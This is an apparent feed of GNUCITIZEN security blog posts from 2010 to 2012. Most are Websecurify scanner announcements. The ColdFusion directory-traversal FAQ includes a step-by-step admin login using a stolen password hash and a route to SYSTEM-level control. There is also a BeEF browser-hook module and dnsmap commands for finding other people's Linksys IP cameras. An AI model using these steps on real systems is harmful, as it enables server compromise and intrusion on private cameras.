GNUCITIZEN Network

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)

noreply@blogger.com (pdp) — Fri, 11 May 2012 20:43:00 +0000

Websecurify Websuite Incidents is a cloud-based web application security scanner, designed to find only critical vulnerabilities and provide tools to exploit them. This video demonstrates how the tool can find CVE-2012-2311 (PHP-CGI vulnerability) and run an exploit against the target to get a command shell.

The video also shows some aspects of the user interface, which are helpful when entering multiple targets. You can simultaneously scan all applications across your organization getting instantaneous feedback about your level of exposure to common and widely exploited security issues.

Websuite Scanner Tutorial

noreply@blogger.com (pdp) — Thu, 03 May 2012 17:56:00 +0000

Actually you don't need one but here it is anyway. It is part of the service. This is really all you need to know to get started. Nothing else is required.

This is How We Code

noreply@blogger.com (pdp) — Thu, 03 May 2012 14:03:00 +0000

Another fun video, which we know you will appreciate.

Retro Websecurify (v0.4) Video

noreply@blogger.com (pdp) — Thu, 03 May 2012 12:03:00 +0000

This video is a preview of Websecurify 0.4 from several years ago and we are publishing it today for yours and ours amusement. Enjoy!

Websuite Scanner Preview Video

noreply@blogger.com (pdp) — Tue, 01 May 2012 18:00:00 +0000

If screenshots are not enough, here is a video how the Websuite Scanner will feel like when you loggin:

Websecurify Websuite Operation

noreply@blogger.com (pdp) — Tue, 01 May 2012 17:41:00 +0000

Here is a diagram how it works:

Websuite Scanner Screenshots

noreply@blogger.com (pdp) — Mon, 30 Apr 2012 22:30:00 +0000

Initial Preview of Websecurify Scanner (scanner.websecurify.com)

noreply@blogger.com (pdp) — Thu, 12 Apr 2012 23:47:00 +0000

The Websecurify Scanner (scanner.websecurify.com) is perhaps the most innovative and exciting product we have the pleasure to be working on and we just cannot wait to show it to you. Before this happens, however, there are bugs to fix and features to implement. Well, there is less of the bugs and more on the features. Nevertheless here are screenshots of some of the main things to be expected when you login.

You may notice that the product is fairly consistent with the general look and feel of our website and all other tools. The user interface is minimalistic but allows further configuration by various buttons, hovers and other controls. This is what we call "easy by design". There is nothing intrusive or obtrusive and you will see later that the interface is customizable.

Websecurify was designed to take away all the hardship from the decision making. In other words, the testing engine will automatically figure out what to do and what to skip. However, we have added features for advanced users to configure various aspects of the testing scope for example. One of the interesting functionalities is the ability to check the test scope before you proceed with the test. We have realised that the last thing we want you to do is to start a test, which is not even properly configured. So, if you decide to switch the advanced users mode, there are safeguards to help you all the way through the security assessment, so you can relax.

It is our trademark to report issues as soon as we find them. This product is no exception. Vulnerabilities are reported as they are found with all details and supporting examples. You can pause, resume or completely stop the test at any point in time.

We have started exposing various configuration options, which will enable you to customize the tool just the way you want it. There are plenty of features you will be able to tune to your likings. One of the options for example allows you to turn on/off additional visual elements. This may be useful especially when you use the tool on screens of different sizes. There are a lot more options like this, which are designed to "save the day" so-to-say.

The product is in private beta, meaning that it is not publicly available just yet. Instead, we offer a signup form, which we use to gradually enable all users. The demand for the application is heigh, which means that we may not be able to turn on your account immediately but do not be discouraged because we are enabling new users on a daily basis.

Websecurify Mobile 1.0.2 for iOS

noreply@blogger.com (pdp) — Tue, 21 Feb 2012 23:11:00 +0000

Websecurify Mobile 1.0.2 for iOS is now live on the iTunes App Store. All existing customers should receive an update within the next 24 hours.

This version contains the following improvements:

The testing engine has been revamped to enable even faster scanning with better results with less device resources.
The user interface has been drastically improved with plenty of new visual enhancements.
The reporting capabilities has been improved with issue counters, which are used as indicators to show areas that require urgent attention.
You can now email the report even when the test is still in progress.

On behalf of the Websecurify team I want to say that it was great pleasure to deliver this version and we hope that you are going to like it as much as we do.

Cold, Coffe, Code

noreply@blogger.com (pdp) — Sun, 05 Feb 2012 19:05:00 +0000

It has been a cold and snowy day here in UK. I've spent most of the time outside making snow men and giant balls of snow. I have also managed to squeeze in some time for pentesting, while drinking coffee in Costa, and I have just finished doing some code refactoring of Websecurify Mobile 1.0.3. Indeed, it has been a productive and very rewarding day.

Here are some screenshots from the latest build of Websecurify Mobile. This release is very stable although we know about one bug, which will be fixed in the next couple of days.

So, in theory, this means that we might be able to get out the next update as soon as next week although this depends on how fast we get through Apple's approval process.

The Upcoming Websecurify Mobile

noreply@blogger.com (pdp) — Wed, 01 Feb 2012 21:45:00 +0000

This is a quick update just to let you know that we are actively working on the next version of Websecurify Mobile for iOS, which will contain the following key improvements:

The latest testing engine (faster, better security checks)
Improved user interface
Ability to email reports
Snappier and a lot faster than the previous version

We are still working on the application color schemes and polishing the user interface but the basic functionalities are there and they work great.

The next update is just a few weeks away.

Websecurify 1.0.2 for Windows and Mac has Arrived

noreply@blogger.com (pdp) — Mon, 16 Jan 2012 00:55:00 +0000

Websecurify 1.0.2 is by far the best version ever released. It is feature packed yet easy to use and as fast as nothing else.

As they say "the devil is in the details" and this version is all about that. A lot of things has been taken care of in order to create a functional and fast web application security scanner with the best possible user experience. Websecurify on Mac looks gorgeous and it is really fast but wait to see Websecurify for Windows. It will change your perception of what security products should be all about.

From the click on the application icon to the first application screen it takes no more than just a moment. This is very different from those pesky, never ending splash screens which we are all acquainted to from other products. The target locationbox is all you need to start a scan with zero configuration. It has been all taken care of for you by default. However, if you feel adventures you can always fire up the side browser which will allow you to pinpoint hot areas for further testing or exclusion. You simply don't need to fiddle with regular expressions or string matching constants which are not only difficult to use but also error prone and very inefficient. It has been all taken care of for you.

After a lot of time spent in the lab searching for the best features we can put in a product that we love we think we have found the best way to do reporting. Reports are generated on the fly. You simply don't need to wait until the end to find out what is going. You can easily filter issues by severity or features with just a single click. Websecurify can not only show you the details of each found issue but also where possible take a screenshot as a proof. There is no other web application security tool out there that does this. Each report is exportable in various formats designed to be easily embedded into your own custom reporting templates. We simply do not support the idea of closed loop marketing by embedding our brand everywhere possible. If you are looking for in-depth information about each issue we even provide JSON and XML reports which contain details about the reported items broken down to the individual components. This is very powerful and can be used to simply your life and save you a lot of time and great deal of stress by implementing your own custom automation workflow.

Last but not least Websecurify 1.0.2 is good fit for wide range of uses and available to everyone: form the experts to the casual users. We have priced the product fairly and in fact more fare than all of our competitors. There is no feature locking. We think it is silly to lock the product to scan only 1-3 web sites and than ask for more cash to unlock the full version as our competitors do. Websecurify is revolutionary in that way. However, what is even more revolutionary is that you are not tied to anual renewal fees. When you buy a major version it is your's to keep and use to test as many web applications as you need. To make it even better, we have even automated the payment process so you can enjoy you version in a few moments after purchase. It is as simple as that and we will keep your version up to date via our online update mechanism, which you can switch of if you don't need it.

So enjoy it and let us hear if you have any comments, suggestions, feedback, bugs or just things that annoy you. Our commitment is to make the best web application security tool out there.

A Collage of Websecurify's Evolution

noreply@blogger.com (pdp) — Wed, 07 Dec 2011 20:53:00 +0000

This is essentially a collage of all pictures from Picasa which we use for this blog. What I find interesting is the story that the picture tells. It really shows the many incarnations of the product and how much effort has been put into it to make what it is today.

Stay tuned for the next major incarnation.

Websecurify's Debute on ITunes and Mac App Stores

noreply@blogger.com (pdp) — Tue, 06 Dec 2011 19:47:00 +0000

Although Websecurify has been officially available on the Mac App Store for several days now and more than a month on the iTunes App Store, it is about time to announce it publicly here. It is true. Websecurify is now the premium web application security testing tool for Mac. It is one of its kind and proud to carry the title of being "the first and only".

The Mac App Store Version is full of awesome improvements incorporated in style and simplicity throughout the entire application. Some of the key features include:

Fully integrated browser which allows fine-tuning of even some of the most demanding applications today.
Adjustable test scope. For more information, see the Wiki page here.
The ability to not only run several test at the same time but also work on multiple projects currently.
Smart reporting system which removes duplicate issues on the fly.
Powerful and quickly accessible report filters to sift through complex tests with numerous issues.
Vulnerability snapshots. What is a security report without the technical details? You get not only the exact details about each vulnerability but also helpful screenshots illustrating the problem in full.
Several built-in reporting mechanism which allow detailed exporting to multiple formats including CSV, XML, JSON, HTML and RTF. HTML and RTF reports include screenshots which can be easily copied around in your own custom reports.
New and improved testing engine which now detects more issues than ever before in a fast and concise way.
Absolutely gorgeous user interface in every single way.

There are some awesome improvements for the iTunes App Store (iPhone) version planned to be released in the upcoming weeks. Here they are:

The ability to email reports even when they are not fully completed. This is a huge win especially when you want to report an issue as soon as you find it.
Brand new testing engine with numerous improvements all over the place.
Faster test cycles. On some medium-size applications it is possible to complete a full test in just a few minutes.

Needless to say, this is just the start of a very exciting future in which we want to make a mark in our own unique way. We would like to use the opportunity to thank our beta testers and everyone who helped us to get to this stage. You are rock starts and you know it.

Websecurify 0.9 is Out

noreply@blogger.com (pdp) — Mon, 03 Oct 2011 05:18:00 +0000

Websecurify 0.9 is now out of our workshop and you can download it from the usual place.

In this release we went back to the basics and reengineered everything from scratch and made it 10 times better. In the process we even managed to create a version which can run on most modern mobile devices although at the moment we only support the iPhone.

Websecurify 0.9 is de facto not only the first web application security testing software ever created for iOS, Android, Blackberry and others, but it is also the very first fully functional integrated web application security testing solution which can run straight from your web browser. This release is perhaps one of the most cross-platform software solutions you will encounter today and we are proud to be the first to do it, putting our orange flag in the history books forever.

However, this is not all... far from it. For the upcoming months we have prepared even more surprises for our loyal fans and supporters. We are planning to completely change everything and make the dent, created by Websecurify, even bigger.

Enjoy this release and if you have a few spare moments tell us what do you think and how we can help you even further.

Websecurify Mobile Beta Test Starts Today

noreply@blogger.com (pdp) — Mon, 08 Aug 2011 19:36:00 +0000

The public beta test of Websecurify Mobile Alpha1 starts today. The WS Dev team would like to personally say "Thank You" to all beta testers who have signed up in the last couple of days. By now you should have received an email with instructions how to participate.

As it usually happens, there is already a service out there which lifts off some kind of burden from your chest. In our case that is TestFlight which will be helping us dealing with the provisioning profile mess during the beta test stages.

If you haven't signed up yet, you can do so here. You can also use the TestFlight recruitment page over here.

Well Websecurify Runs on The iPhone

Thu, 04 Aug 2011 16:27:04 +0000

This is not necessarily news anymore since it was discussed on the Websecurify official blog but we are so excited about it that we could not hold ourselves from posting it here too.

The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. This is not directly and only applicable to the iPhone version. No! Similar tradeoffs are also present even in standard desktop/server based scanners although they are usually less visible and obscured behind tones of options. The bottom line is that the scanner not only runs natively on the iOS but also works as expected.

Now this is exciting! Websecurify is the first in the world mobile web application testing technology.

If you have any suggestions, recommendations or general feedback please do let us know. You can also participate in the beta test program which will allow you to have a play with tool as we are polishing it for the official release.

The possibilities are endless.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Websecurify for the iPhone Preview

noreply@blogger.com (pdp) — Wed, 03 Aug 2011 17:22:00 +0000

This is a quick preview of Websecurify running on the iPhone. Keep in mind that the application runs natively and uses the device own resources to perform the test.

We are still looking for beta testers. If you have an Apple device and you are willing to try Websecurify please fill in the form provided here. Thanks in advance.

Websecurify for the iPhone

noreply@blogger.com (pdp) — Sun, 31 Jul 2011 16:22:00 +0000

The multi-platform support is perhaps the most advantageous feature of Websecurify 0.9. Our testing engine is not only capable of handling even the most resource demanding applications but also run smoothly on mobile devices such as the iPhone.

We are essentially in the final stages of development of the Websecurify Mobile edition. At the moment the user interface is simple, solid and fully functional. The mobile testing engine is fully functional inside the iPhone although we are going to make some drastic improvements to reduce testing time on complex applications.

Needless to say, we need beta testers. So, if you own an iPhone and you are willing to try Websecurify, please fill in your details here and we will get back to you with instructions.

Thanks.

Try Websecurify Scanner 0.9Alpha1

noreply@blogger.com (pdp) — Thu, 28 Jul 2011 19:07:00 +0000

Websecurify Scanner 0.9Alpha1 is now available for download from the usual place.

This release contains numerous improvements including but not limited to:

Our multi-platform testing engine available for JavaScript, Java, Objective-C, and C
Simplified and more intuitive user interface
Better and simpler extension technology
Generally faster and more more memory efficient tasks

Keep in mind that this is still an Alpha. More features and general improvements are expected in the final release.

Websecurify Scanner 0.9Alpha1

noreply@blogger.com (pdp) — Sat, 09 Jul 2011 19:42:00 +0000

The Websecurify Scanner 0.9Alpha1 is under heavy development. While we are pleased with the results, there is so much more to do.

Some of the main features so far are listed bellow:

The basic/default scanner is smarter, faster, lighter and more selective - this means that some types of applications, in particular those which have a lot of pages, will be scanned under a fraction of the time which takes when testing with Websecurify 0.8.
The scanning technology is memory efficient and the memory storage is swappable - while the scanner should be able to handle most applications within a reasonable amount of memory, if needed we can quickly introduce other storage mechanisms depending on the situation and as such scale the scanning technology as much as required.
Everything is configurable - while we may not expose all scanning features and options in the default installation, it is certainly possible to configure a lot of aspects of how the testing engine works. This is the reason why 0.9 will provide different types of scans which are optimised for the particular task. For example, a scan against a blog is very different from a scan against Sharepoint. The templates not only provide pre-build settings but also different testing engines specifically optimized for the target technology.

These are the main features so far. More features are coming up very soon plus the first alpha release should be available for download in the following weeks.

Latest Developments

noreply@blogger.com (pdp) — Thu, 23 Jun 2011 23:08:00 +0000

If you are wondering what is happening to Websecurify, well... we are working really hard to get 0.9 out of the door. So, hopefully you will be able to see the first alpha in the following weeks.

Many improvements should be expected in 0.9 but most important ones are related to stability and speed. One of the key improvements around the testing engine is the balance between the types of tests we typically want to perform and the quality, dictating that we wont miss important vulnerabilities but at the same ensuring the test completes within reasonable time and in the most efficient way.

As you can see from the screenshot above, we have also reengineered the entire UI. Now the main window is lighter and everything should feel very easy and fast.

As usual, feedback is always welcome.

Stuxnet

Mon, 13 Jun 2011 15:21:37 +0000

I have been avoiding the topic about Stuxnet for quite some time, mainly because there were many others who spent the time to take the virus apart. However, here is a video, which I find rather amusing:

Wether this is the real deal or simply fear mongering, I simply don’t know. It is all speculations at the moment. The only thing we can say is that it is difficult to deny the fact that computers are important and whoever has control over them has control over people lives and can influence a lot of things including politics.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Websecurify: Pentest Edition

noreply@blogger.com (pdp) — Mon, 30 May 2011 18:59:00 +0000

Since the new Websecurify engine will support multiple programming platforms, including but not limited to Objective-C, JavaScript, Java, Python and Ruby, we decided to assemble a version designed to be used specifically in penetration tests.

"What is the difference?" - you may ask. Websecurify: Pentest Edition is all about maximizing your work. It is designed to be used from the a GUI but also from the command line. In this respect, this version of Websecurify is very rough and require certain level of expertise and familiarity of automated web technologies.

The other main difference is that the tool is Java-based and can be used in conjunction with other popular java-based web auditing tools. In fact, Websecurify: Pentest Edition actually augments these other tools in many different ways and generally gets the work done, speeding up the borring work while still providing room for manual tweaking to get the perfect balance.

Websecurify Heads-up

noreply@blogger.com (pdp) — Tue, 12 Apr 2011 23:02:00 +0000

This is just a quick post to all WS fans just to let you know that we are franticly working on the next iteration of your favourite web application security platform. The future certainly looks very promising and exciting as we have prepared a couple of new things that will be coming out very soon.

First, the testing engine was rewritten from scratch. The new engine now allows us to do things impossible to achieve with the older version at a 10 times the speed and in a lot less memory too.

Second, we are working on the Acidbrowser project. This work was split into a separate source tree and by the look of it the project will be very challenging. We decided that if we are going to put the effort into making a decent web app testing browser, we may as well put a little bit more enthusiasm and turn the project into something really special. In the pipeline we have some ideas that will hopefully blow your mind.

Finally, we managed to get around creating a Websecurify SaaS solution based on our new testing engine with a few added extras. It should run from the cloud. It should easily handle hundreds upon hundreds of connections. It is really easy to use and it looks absolutely stunning.

There you have it.

Acidbrowser: 24h Later

noreply@blogger.com (pdp) — Thu, 17 Mar 2011 01:08:00 +0000

It has been almost a day since we announced the first official release of Acidbrowser and we already have some good news. The tool now supports a powerful console which quickly allows you to change configurations (proxy settings for example) and do other nifty things.

As usual, extending the console capabilities is super easy so anyone can add their own little tools that just make a difference.

As a bonus, we also improved the browser interface quite a bit and fixed a bug.

Landing Acidbrowser 0.8

noreply@blogger.com (pdp) — Tue, 15 Mar 2011 20:35:00 +0000

One of the best things about the Websecurify Runtime is that it is super extensible. We are not only targeting JavaScript on Xulrunner but also JavaScript on Nodejs, Java, Objective-C and a few other development platforms. So, we play a lot with technology and usually we come up with some wacky ideas in the process.

Not long ago, it became quite apparent that the web security field lacks a powerful browser designed specifically for penetration testing purposes. A decision was made to build one. This is how the idea behind Acidbrowser was born. In summary, the Acidbrowser project aims to bring all good web application security tools closer to the browser. The reason for this is simple. While web testing proxies are good, they are very difficult to use with more complex/modern web applications. In order to solve this problem we need a solution that not only understands the basics of HTTP but also quite a bit about the DOM and all modern web application technologies.

The current version (0.8) of Acidbrowser is just an empty shell, meaning that no real penetration testing tools have been integrated just yet. The reason for this is simple. While we can easily put some of the existing code, we want to build the browser gradually by developing quick hacks and extensions. That being said, we are hopefully going to release some extensions soon. Meanwhile you can build your own extensions and help you and the community in the process. Don't hesitate to get in touch with us.

I hope you find the tool useful and we are excited to hear about your ideas.

Oh! As usual you can download the tool from here.

Having fun with BeEF, the browser exploitation framework

Tue, 22 Feb 2011 11:40:26 +0000

We haven’t featured any guest bloggers in a while, but we’re glad to be featuring Chirstian Frichot this month! Christian is a security professional based in Perth, Western Australia. He’s currently working in the finance industry as part of a tight-knit internal team of security consultants doing their best to protect their business and customers from technical threats such as malware or insecure web applications.

After having met Wade Alcorn (the initial author and project lead of BeEF), Christian mentioned his interest in helping out on the project where he could, which eventually led to Wade accepting his offer. The discussion was held over a couple of bottles of wine, so perhaps Wade’s regretting the decision now!

Christian’s role within the BeEF project, if it were to be defined, is odd-jobs-go-to-boy, command-module implementer, Ext-JS-fighter and twitter maintainer. When Christian is not working on BeEF, he’s doing his best to represent the Perth OWASP Chapter, or laying down crunchy beats on the drum-kit.

What follows are Chritian’s words on the BeEF project.

Sorry vegetarians, but BeEF is back. That’s right, the Browser Exploitation Framework is back, and it has now been rewritten from the ground up in Ruby. For those unfortunate people who haven’t had a chance to explore the older, PHP version of BeEF you’re only missing out on one of the greatest, most extensible XSS-payload management and exploitation frameworks out there, and the Ruby re-write is no different.

The Browser Exploitation Framework (BeEF) is a powerful, professional security tool. BeEF is pioneering techniques that provide the experienced penetration tester with practical client side attack vectors. Unlike other security frameworks, BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target.

One of the newer modules implemented in BeEF utilises the insecure handling of URL schemes in Apple’s iOS to trick Skype into starting an outbound call. This vulnerability was first written about by Nitesh Dhanjani and highlights that with the growing popularity of these devices these sorts of issues may lead to losses of information or other negative impacting events. The module itself is as simple as:

beef.execute(function() {
Â  Â document.body.innerHTML = "?call>";

Â  Â beef.net.sendback("<%= @command_url %>", <%= @command_id %>,
"result=IFrame Created!");
});

which, once added to a particular hooked browsers command queue will simply execute upon next poll, and if they automatically authenticate to the Skype application, will initiate a call. Due to iOS’ multi-tasking the Skype app does pop up to the top, so the end user is aware that the activity is occurring, but they’re not prompted to “confirm” the action. You can see this module demonstrated bellow:

The current release is 0.4.2.1-alpha, but by release 0.5 (the Sirloin Release) we’re expecting to have at least all of the PHP BeEF functionality provided plus much more, including:

jQuery included as part of the hooking process
Metasploit integration
Evercookie’s for persistence even after a hooked browser has been closed
full event logging, not just keystroke logging, to include window activation/deactivation, mouse clicks, etc
arbitrary HTTP requester
proxying
persistence modules (subtle popups or 100%x100% iframes)
detecting of social networking authentication status (as per this)

You can find out more about beef over at http://beef.googlecode.com or by following the @beefproject.

BeEF – Get it into ya!

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

The Making of Metagun

Tue, 24 Aug 2010 17:58:07 +0000

This is a wonderful timelapse video of a guy making a game in 48 hours.

The obvious choice of technology is Java. Great stuff!

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

ColdFusion directory traversal FAQ (CVE-2010-2861)

Fri, 13 Aug 2010 15:31:33 +0000

A new Adobe hotfix for ColdFusion has been released recently. The vulnerability which was discovered by Richard Brain, was rated as important by Adobe and could affect a large number of Internet-facing web servers. The FAQ bellow is meant to shed some light on this vulnerability so that ColdFusion administrators can understand what they’re up against.

The FAQ

Finally, by producing this FAQ I will attempt to explain why (at least on certain setups) this vulnerability should have been granted a CRITICAL rating by Adobe, rather than Important. As we’ll see bellow, it is possible to fully compromise the underlying OS of a vulnerable ColdFusion server by exploiting this directory traversal vulnerability.

How does the vulnerability work?

The vulnerability is a variation of a classic directory traversal vulnerability, also referred to as arbitrary file retrieval. The attack involves tricking a server-side script to provide the contents of a file that it was not originally supposed to be made available. By moving up a few directory levels, the attacker is able to obtain the contents of files outside the application server’s webroot via special strings such as ../. More information can be found on the OWASP website.

Is authentication required to exploit this vulnerability?

NO. The attacker doesn’t require knowledge of any passwords in order to exploit the directory traversal bug.

What’s the goal of the attacker when exploiting this vulnerability?

Just as any other type of directory traversal vulnerability, the attacker would usually attempt to obtain source code of the target site in order to identify security vulneraibilities. Additionally, the attacker would most likely attempt to obtain configuration files containing sensitive information. For instance, in the case of ColdFusion the attacker would most likely attempt to read the contents of neo-security.xml and password.properties. These configuration files contain database connection credentials and the ColdFusion administrator password respectively. Depending on how password.properties has been setup, the ColdFusion admin password will be hashed or stored in clear-text (encrypted=false).

What’s the worst that could happen once this vulnerability has been exploited successfully?

As we’ll see at the end of this post, once the attacker has gained access to the CF admin console – e.g.: by cracking the admin password – it might be possible to fully compromise the underlying OS.

How can the vulnerability be resolved?

You can either apply Adobe’s patch or restrict access to the following directories and file from trusted IP addresses only: /CFIDE/adminapi/ /CFIDE/administrator/ /CFIDE/componentutils/ /CFIDE/wizards/ /CFIDE/install.cfm

What are the mitigating factors?

This vulnerability cannot be exploited on ColdFusion 9.X when default settings are used, unless of course you figure out a way to get around the directory traversal signatures used by the filtering routines. Additionally, the ColdFusion administrator login console must be available to the attacker. It is however quite common to find CF admin consoles directly available on the Internet.

~~If a long and sufficiently random admin password is used, cracking the SHA1 hash could prove to be difficult. This is applicable to CF MX7, 8 and 9~~ (see UPDATE notes). Version 6 doesn’t hash the password, but instead encrypts it using a proprietary algorithm.

What versions of ColdFusion are affected?

According to the Adobe bulletin the affected versions are ColdFusion 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions for Windows, Macintosh and UNIX. However, due to time constraints I have only personally confirmed the vulnerability on version 8.0.1 under Windows.

Can you provide the actual exploit?

No. ProCheckUp will provide the exploit details at a later date. Although Richard Brain privately shared POC URLs with me, I will not make them available. Exploit details were only provided to me as a trusted security analyst for purpose of assessing the impact of the vulnerability and help me write this FAQ in the hope that it will benefit the community.

UPDATE: the exploit details were published by an anonymous researcher on 14/08/2010, probably worked out by reverse-engineering Adobe’s patches. ProCheckUp has also released the exploit details as of 17/08/2010.

Can you describe a real attack scenario?

The following a real attack scenario against ColdFusion 8 on a Windows server:

Attacker confirms ColdFusion admin console is Internet facing. E.g. http://target-domain.foo/CFIDE/administrator/index.cfm
Attacker exploits directory traversal vulnerability and obtains the contents of C:\ColdFusion8\lib\password.properties, which contains the ColdFusion admin password
If the admin password was stored encrypted (actually CF8 hashes the admin password using the SHA1 algorithm, similar to CF MX7), the attacker then attempts to crack it via an offline password cracking attack or rainbow table lookup. Note that the default setting in ColdFusion 8 is encrypted=true as per password.properties file. Otherwise, if the password is stored unencrypted (encrypted=false), there would be no need for password cracking.
UPDATE: as suggested by Niels Teusink, an attacker could login as the CF administrator without needing to crack the SHA1 hash. I verified his observation and can confirm it works well. You can follow these steps (tested on Firefox 3.6.8) to login using the SHA1 hash. i.e.: no need to crack the password hash:
1. Configure your favorite MITM proxy – e.g. Burp – to capture traffic between your browser and target CF admin console
2. Enter hash in password field of login form (usually located on /CFIDE/administrator/enter.cfm)
3. Type the following on your browser’s address bar and press enter (make sure JavaScript is enabled on your browser): javascript:hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value)
4. Record value. e.g. AFA9C9D917916DE6CE05C1BFEC0470E07A246CB0
5. Press browser’s Back button
6. Press Login on the login form (trapping/intercept mode should be enabled on your MITM proxy at this point)
7. Trap the login request and replace the value of the cfadminPassword parameter with the value recorded above
8. Forward request
At this point, the attacker would be able to login as a CF admin and upload a malicious CFM script that would allow him to run remote commands (SYSTEM privileges by default). Uploading files to a CF server via the administrator console is a bit counter-intuitive. The attacker would basically add a scheduled task that would download cfexec.cfm to the server’s webroot
At this point, the attacker has gained full control of the underlying Windows OS as the CF service runs with SYSTEM privileges by default

If the CF admin password is hashed and the attacker is unable to crack it, he could always try to obtain the database connection credentials (C:\ColdFusion8\lib\neo-datasource.xml) which can be easily decrypted and then directly authenticate to the backend DB server. This however wouldn’t normally be possible on a firewalled environment where the back-end DB server is not directly exposed to the Internet. Network access controls are your friends!

Post Updates

16/09/2010 – new path added as part of blacklisting solution
16/09/2010 – added trick to login without cracking the CF admin password hash
16/09/2010 – mentioned recently published exploit code for the CF traversal vulnerability
18/09/2010 – fixed typos and mentioned release of exploit details by ProCheckUp

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

1ST European Edition of HITB Coming Up!

Thu, 24 Jun 2010 09:16:22 +0000

In case you haven’t heard yet, HITBSecConf is hosting the first European Edition of their conference in Amsterdam during 1st-2nd July ’10. The history of the HITB conferences can be traced back to 2002, the year in which the first ever edition of HITB took place in Malaysia. Since then, HITB has grown to become the biggest technical computer security event in Asia and has extended their presence to the Middle East and now Europe.

HITB aims to congregate members of the security community from all circles. From academics, and well known infosec personalities to loner-type independent researchers, and hobbyists just to name a few. I’ve personally attended past editions in Kuala Lumpur and Dubai and loved that the attendees and speakers came from a wide variety of backgrounds. If you don’t believe me, check out the pix of past conferences and you’ll find sec nerds and corporate professionals all partying in unison. Indeed, the HITB conferences are not only educational, but among the most fun sec events I’ve had the chance to attend.

Registration is still open, so you are still on time to take advantage of a great speaker lineup and one of the _de facto_ party capitals of Europe. The conference agenda can be found here. I’m really looking forward to Niels Teusink’s presentation on hacking Logitech wireless presenters and the release of detailed examples of JIT-spray techniques against IE8, FF3.6 by Alexey Sintsov (originally discussed by Dion Blazakis).

One more thing, almost forgot: there will be a bring-your-own-laptop web hacking challenge at HITB EU.

See you at HITB Amsterdam next month!

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Exit Through the Gift Shop

Wed, 07 Apr 2010 13:43:41 +0000

… is a new movie from the notorious street artist Banksy. The trailer looks very interesting. Here it is:

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Jerry Rice on Success

Fri, 12 Mar 2010 08:58:37 +0000

There is a nice story about Jerry Rice, american football player, running in the Sunday, February 9, 2010 print edition of the San Francisco Chronicle’s. The story is about the secrets of success.

In summary the secret of success according to Jerry Rice is the following:

Put effort
You will have to struggle
Persist despite the setbacks
Strategize and make your choices
Choose difficult tasks
Keep learning and trying to improve

According to Carol Dweck’s research (read MindSet) success in nutshell is all about in the trying and the doing. Apart from the putting effort and to keep learning, Carol Dweck also suggests that another success ingredient is to capitalise on mistakes and to comfront deficiencies as they allow you to learn more

At the end of the day it is down to what works for you. There isn’t universal truth.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Time Blocking

Tue, 09 Mar 2010 14:21:54 +0000

This is an interesting video which discusses why you should avoid distractions while working in order to stay as much productive as possible.

---
recent posts from the gnucitizen network:

Websecurify Websuite Incidents (PHP-CGI, CVE-2012-2311)
Websuite Scanner Tutorial
This is How We Code
Retro Websecurify (v0.4) Video
Websuite Scanner Preview Video

Hacking Linksys IP Cameras (pt 6)

Wed, 24 Feb 2010 07:18:29 +0000

This article is a continuation of the following GNUCITIZEN articles: here, here, here, here and here.

As we know, there are several ways one could go about hunting for IP cameras on the net. The slowest way would be to portscan random IP addresses for certain ports and programmatically detect if the web interface of a given camera was available on the open ports found. This method definitely works, but it can be very time consuming as it consists of scanning random IP addresses hoping that we’ll eventually come across the type of device we’re interested in.

The second method, which would be much faster in finding our target devices, would be to use a search engine and query content that is unique to our target devices (e.g.: URLs, HTML title). This method, popularized by GHDB is simple and effective. The only issue I find with this strategy is that many of these IP cameras found happen to respond very slowly. This is probably due to other curious individuals running the same searches and accessing the same cameras.

The third method which would allow you to find more hidden Linksys IP cameras (i.e.: not cached by search engines a.k.a. the hidden web), would consist of bruteforcing subdomains within dynamic domain names (DDNS) used by our target devices (Linksys IP cameras in this case). For instance, the following are some of the dynamic domain names supported by the WVC54GCA and WVC80N Linksys IP camera models:

linksys-cam.com
mylinksyscamera.com
mylinksyshome.com
mylinksyscam.com
mylinksysview.com
linksysremotecam.com
linksysremoteview.com
linksyshomemonitor.com

Camera discovery process through subdomain bruteforcing

We first save the aforementioned domains in a file, doms in this case. Then we use dnsmap to bruteforce subdomains for each of the domains included in doms.

Using dnsmap’s built-in wordlist:

$ for i in `cat doms`;do dnsmap $i -r ~/ -i 64.14.13.199,216.39.81.84&done;

Using a user-supplied wordlist, wordlist_TLAs.txt in this case, which is a three-letter acronym wordlist included with dnsmap v0.30:

$ for i in `cat doms`;do dnsmap $i -w wordlist_TLAs.txt -r ~/ -i 64.14.13.199,216.39.81.84&done;

Note: dnsmap’s -i option allows ignoring user-supplied IP addresses from the results. In this case, 64.14.13.199 and 216.39.81.84 belong to the DDNS service provider, and would therefore be regarded as false positives in this case (we’re only interested in IP cameras setup by their respective owners after all). For more info on how to use dnsmap, checkout the README file.

